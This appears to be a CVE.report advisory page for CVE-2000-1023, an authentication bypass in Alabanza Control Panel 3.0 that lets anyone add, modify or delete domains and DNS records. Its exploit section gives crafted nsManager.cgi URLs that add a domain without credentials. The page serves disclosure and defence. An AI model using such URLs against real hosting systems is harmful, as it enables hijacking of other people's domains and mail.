Alabanza Control Panel Domain Modification Vulnerability

BID:1710

Info

Alabanza Control Panel Domain Modification Vulnerability

Bugtraq ID: 1710
Class: Access Validation Error
CVE: CVE-2000-1023
Remote: Yes
Local: Yes
Published: Sep 24 2000 12:00AM
Updated: Jul 11 2009 03:56AM
Credit: Posted to Bugtraq on September 24, 2000 by Weihan Leow <[email protected]>.
Vulnerable: Alabanza Control Panel 3.0
Not Vulnerable:

Discussion

Alabanza Control Panel Domain Modification Vulnerability

Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.

Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.

Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).

Exploit / POC

Alabanza Control Panel Domain Modification Vulnerability

To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):

http://target/cp/rac/nsManager.cgi?Domain=&lt;example.com&gt;&amp;IP=&lt;IP address&gt;&amp;OP=add&amp;Language=english&amp;Submit=Confirm

Accessing the following URL:

http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&amp;IP=127.0.0.1&amp;OP=add&amp;Language=english&amp;Submit=Confirm

will display a page stating:

"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com &lt;IP address&gt; will be setup within 1 hour!

Please click here to go back."

From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.

Solution / Fix

Alabanza Control Panel Domain Modification Vulnerability

Solution:
A security patch has been applied to remedy the problem. Scripts that had been disabled to prevent this vulnerablity have once again been restored to normal status.

References

Alabanza Control Panel Domain Modification Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report